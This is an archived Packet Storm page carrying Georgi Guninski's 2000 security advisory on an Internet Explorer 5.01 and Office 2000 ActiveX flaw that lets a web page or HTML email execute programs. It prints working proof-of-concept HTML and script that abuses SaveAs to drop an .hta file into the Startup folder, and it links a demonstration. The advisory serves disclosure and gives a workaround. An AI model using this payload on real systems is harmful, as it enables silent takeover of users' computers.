exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

ie5-excel-powerpoint.txt

ie5-excel-powerpoint.txt
Posted Jun 29, 2000
Authored by Georgi Guninski | Site nat.bg

Georgi Guninski security advisory #13 - Internet Explorer 5.01, Excel 2000 and PowerPoint allow executing programs when viewing a web page or HTML email message via insecure ActiveX controls. This allows taking full control over user's computer. Demonstration available here.

tags | exploit, web, activex
SHA-256 | f41e05939819ebcc5e580519c20fa7f242ed21f010334bb9e1e5c4204510a020

ie5-excel-powerpoint.txt

Change Mirror Download
Georgi Guninski security advisory #13, 2000

IE 5 and Excel 2000, PowerPoint 2000 vulnerability - executing programs

Systems affected: IE 5.01, Excel 2000, PowerPoint 2000, Win98 - probably
other versions, have not tested
Risk: High

Disclaimer:
The opinions expressed in this advisory and program are my own and not
of any company.
The usual standard disclaimer applies, especially the fact that Georgi
Guninski is not liable for any damages caused by direct or indirect use
of the information or functionality provided by this program.
Georgi Guninski, bears NO responsibility for content or misuse of this
program or any derivatives thereof.

Description:
Internet Explorer 5.01, Excel 2000 and PowerPoint under Windows 98
(suppose other versions are also vulnerable, have not tested) allow
executing programs when viewing a web page or HTML email message - in
the latter case at least with IFRAME.
This allows taking full control over user's computer.

Details:

IE 5.01 allows getting dangereous ActiveX objects with the help of the
<OBJECT> tag and Office 2000 applications.
For example, the following code loads a .xla file:
<object data="Book1.xla" id="sh1" width=0 height=0></object>
where Book1.xla is just a .xls file renamed to .xla. The same result may
be achieved with a .ppt or .xls file, probably other Office 2000 file
types.
The result is having an object in IE that has a method SaveAs().
Suppose there are more dangerous methods, have little knowledge on
Office 2000 objects.
The SaveAs method may save the Excel Workbook (or Addin) or PowerPoint
object in arbitrary location, including the Start Up folder.
The content of the saved file is controllable and depends on the content
of Book1.xla.
If the saved file is for example a .hta file, it is possible to execute
arbitrary programs on the user's computer.

The code is:
---------------------------------------------------
<object data="Book1.xla" id="sh1" width=0 height=0>
</object>
<SCRIPT>
function f()
{
fn="C:\\georgi-xla.hta";
sh1.object.SaveAs(fn,6);
//sh1.object.SaveAs("C:\\windows\\Start
Menu\\Programs\\StartUp\\georgi-xla.hta",6);
alert(fn+" sucessfully written");
}
setTimeout("f()",5000);
</SCRIPT>
---------------------------------------------------

Demonstration is available at:
http://www.nat.bg/~joro/sheetex.html

Workaround: Disable Active Scripting or Disable Run ActiveX controls and
plug-ins

Copyright 2000 Georgi Guninski

Regards,
Georgi Guninski
http://www.nat.bg/~joro


Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close